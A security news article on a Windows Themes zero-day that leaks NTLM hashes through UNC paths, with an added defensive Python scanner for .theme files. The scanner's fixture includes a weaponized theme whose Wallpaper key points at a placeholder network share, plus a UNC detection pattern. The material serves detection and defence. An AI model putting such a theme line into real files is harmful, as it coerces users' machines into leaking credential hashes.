Persistent Windows Vulnerability Could Leak User Credentials: Zero-Day Exploit Allows NTLM Hash Theft

October 29, 2024

The vulnerability in all versions of Windows, from Windows 7 to Windows 11, could allow attackers to steal NTLM authentication hashes from users. This zero-day flaw was reported to Microsoft by researchers at ACROS Security, who discovered it while creating a patch for an older Windows system related to CVE-2024-38030, a medium-severity Windows Themes spoofing vulnerability that Microsoft had mitigated in a previous security update. The newly discovered vulnerability is similar to CVE-2024-38030 and enables an authentication coercion attack, where a compromised device is tricked into sending NTLM hashes, a cryptographic representation of a user's password, to an attacker's system.

The flaw that ACROS discovered is separate but related to two flaws previously reported by Akamai researcher Tomer Peled. Windows themes files allow users to alter the look of their Windows desktop interface using wallpapers, screen savers, colors, and sounds. The vulnerabilities discovered by Peled were related to how these themes handled file paths to image resources, specifically 'BrandImage' or 'Wallpaper'. Due to improper validation, an attacker could alter the legitimate path to these resources to make Windows automatically send an authenticated request, along with the user's NTLM hash, to the attacker's device.

The original vulnerability (CVE-2024-21320) stemmed from the fact that these key/value pairs accepted UNC paths, a standardized format for identifying network resources such as shared files and folders on network drives. This meant that a weaponized theme file containing a UNC path could trigger an outbound connection with user authentication, without the user being aware. Microsoft addressed the issue by adding a check on the file path to ensure it wasn't a UNC path. However, the function Microsoft used for this validation allowed some bypasses, leading to the discovery of the second vulnerability (CVE-2024-38030).
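Defenders who want to triage theme files before they reach an endpoint can look for exactly the pattern described above: a resource key in a .theme file whose value points at a network location rather than a local file. The scanner below is an added example and is not code from the article, from ACROS, or from Microsoft. It assumes the standard INI layout of .theme files (a `[Theme]` section holding `BrandImage` and a `[Control Panel\Desktop]` section holding `Wallpaper`), uses its own conservative UNC heuristic rather than Microsoft's validation routine, and embeds two constructed sample files (one benign, one pointing at a placeholder network host).

```python
import re
from typing import Dict, List, Tuple

# Theme keys that reference image resources, matching the ones named in the
# article. Section/key names follow the .theme INI format; assumption: this
# list is illustrative, not an exhaustive inventory of path-bearing keys.
WATCHED_KEYS = (
    ("theme", "brandimage"),
    ("control panel\\desktop", "wallpaper"),
)

# Conservative "points at a network location" heuristic: a UNC prefix in either
# slash style, or the \\?\UNC\ long-path form. This is our own check, not the
# validation function Microsoft used.
_UNC_RE = re.compile(r"^\s*(?:\\\\\?\\UNC\\|\\\\|//)", re.IGNORECASE)


def is_unc_path(value: str) -> bool:
    """True when the value starts with a UNC-style network prefix."""
    return bool(_UNC_RE.match(value))


def parse_theme(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI parser for .theme files: [sections], key=value, ';' comments.

    Section and key names are lowercased so lookups are case-insensitive,
    which mirrors how Windows treats INI names. Values keep their case.
    """
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def find_network_references(text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) for each watched key whose value is a UNC path."""
    findings = []
    sections = parse_theme(text)
    for section, key in WATCHED_KEYS:
        value = sections.get(section, {}).get(key)
        if value is not None and is_unc_path(value):
            findings.append((section, key, value))
    return findings


# Constructed sample: a theme that only references local resources.
BENIGN_THEME = r"""
; Windows Theme (constructed sample)
[Theme]
DisplayName=Corporate Blue
BrandImage=%SystemRoot%\web\wallpaper\Windows\brand.png

[Control Panel\Desktop]
Wallpaper=C:\Users\Public\Pictures\corporate.jpg
"""

# Constructed sample: the Wallpaper key points at a placeholder network host.
SUSPICIOUS_THEME = r"""
[Theme]
DisplayName=Free Theme

[Control Panel\Desktop]
Wallpaper=\\untrusted-host.example\share\wallpaper.jpg
"""

if __name__ == "__main__":
    for label, theme in (("benign", BENIGN_THEME), ("suspicious", SUSPICIOUS_THEME)):
        hits = find_network_references(theme)
        print(f"{label}: {'no network references' if not hits else hits}")
```

The check deliberately flags any watched key that begins with a network prefix, regardless of whether the referenced host exists; a theme that needs a network image is unusual enough in most environments that the finding is worth a human look. Pair this with the mitigations the article names (restricting outbound SMB at the perimeter and disabling NTLM where feasible) rather than relying on file inspection alone.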

ACROS Security reported a third Windows Themes spoofing vulnerability this week, rooted in the same file path issue. The newly discovered vulnerability also does not require the attacker to have any special privileges. However, the attacker must get the user to copy a theme file to another folder on their computer, then open that folder in Windows Explorer using a view that renders icons. The file could also be automatically downloaded to the Downloads folder while the user visits the attacker's website, in which case the attacker would have to wait for the user to view the Downloads folder at a later time. Organizations are advised to disable NTLM where possible, but doing so could cause functional issues if any network components rely on it. The vulnerability can only succeed against a computer where NTLM is enabled. An attacker would also need to ensure that a request initiated by a malicious theme file could reach the attacker's server on the Internet or in an adjacent network, something that firewalls should typically block.
